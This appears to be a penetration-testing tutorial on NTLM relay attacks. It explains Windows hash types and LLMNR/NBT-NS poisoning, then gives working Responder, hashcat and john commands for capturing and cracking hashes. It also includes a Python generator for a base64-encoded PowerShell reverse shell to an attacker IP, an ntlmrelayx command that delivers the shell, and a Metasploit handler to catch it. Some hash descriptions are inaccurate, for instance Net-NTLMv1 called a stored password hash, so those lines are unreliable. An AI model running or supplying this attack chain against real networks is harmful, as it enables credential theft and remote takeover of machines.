NTLM Relay

Windows Authentication

LM	Was being used by default before windows vista, windows server 2008 (Weak hashing algorithm).
NTLM (NT Hash)	Currently used for storing passwords at windows systems (Used for pass-the-hash attack).
NTLMv1 (Net-NTLMv1)	Currently used for storing passwords at windows systems (Used for pass-the-hash attack).
NTLMv2 (Net-NTLMv2)	Same as NTLMv1, just with some modification on the encryption algorithm.

NTLM Authentication Mechanism

1. The user enters his username and password.

2. The client initiates a negotiation request with the server, that request includes any information about the client's capabilities as well as the Dialect or the protocols that the client supports.

3. The server picks up the highest dialect and replies through the Negotiation response message then the authentication starts.

4. The client then negotiates an authentication session with the server to ask for access.

5. The server responds to the request by sending an NTLM challenge.

6. The client then encrypts that challenge with his own pre-entered password’s hash (NTLM Hash) and sends his username, challenge, and challenge-response back to the server (Net-NTLM Hash).

7. The server tries to encrypt the challenge as well using its own copy of the user’s hash (NTLM Hash) which is stored locally on the server in case of local authentication, or pass the information to the domain controller in case of domain authentication, comparing it to the challenge-response, if equal then the login is successful.

Note: To use NTLM authentication instead of Kerberos authentication, access IP addresses instead of Hostnames dir \\10.0.2.100\c$

LM / NTLM Hashes are used for Pass-The-Hash attacks, while Net-NTLMv1 / Net-NTLMv2 Hashes are used for NTLM Relay attacks.

Pass-The-Hash will do all the same previous authentication processes because all these processes are based on the user's hash, not the user's password.

NTLM Relay attack takes place at the Session Setup Request Authentication step.

LLMNR & NBT-NS Poisoning

• The victim wants to go to the print server at \printserver, but mistakenly typed in \pintserver.

• The DNS server responds to the victim saying that it doesn’t know that host.

• The victim then asks if there is anyone on the local network that knows the location of \pintserver.

• The attacker responds to the victim saying that it is the \pintserver.

• The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.

• The attacker can now crack the hash to discover the password.

Responder

git clone https://github.com/SpiderLabs/Responder
python Responder.py -I eth0 -wrf

NTLM Cracking

NTLMv1 (Net-NTLMv1) Crack

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

NTLMv2 (Net-NTLMv2) Crack

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt

NTLM Relaying

• SMB Signing must be disabled, and this is the default setting except for the domain controllers.

• Relay the hashes to another machine.

• User must have admin access on this machine.

Responder with SMB & HTTP Disabled (in Responder.conf)

git clone https://github.com/SpiderLabs/Responder
python Responder.py -I eth0 -wrf

Determine the machines that have SMB signing disabled

Powershell Reverse Encoded Shell

import base64
ip = '10.10.12.133' # your reverse shell ip
port = 4444 # your reverse shell port
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print cmdline

Run ntlmrelayx.py script and pass to it the encoded reverse shell.

git clone https://github.com/SecureAuthCorp/impacket
python3 ntlmrelayx.py -smb2support -tf targets.txt -of result -debug -c 'powershell -e EnCoDeDShElL'

Metasploit multi handler to receive the shell.

msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 10.0.2.15
set lport 4444
set ExitOnSession False
exploit -j

Overall Process Overview

Machine 10.0.2.7 asks for an unknown host, then the attacker machine 10.0.2.15 responds to it with its own IP address, then machine 10.0.2.7 sends its credentials to the attacker machine 10.0.2.15 on port SMB, then the attacker machine takes these credentials and relays them to another machine 10.0.2.6, then machine 10.0.2.6 executed our reverse shell and the shell get back to us at 10.0.2.15.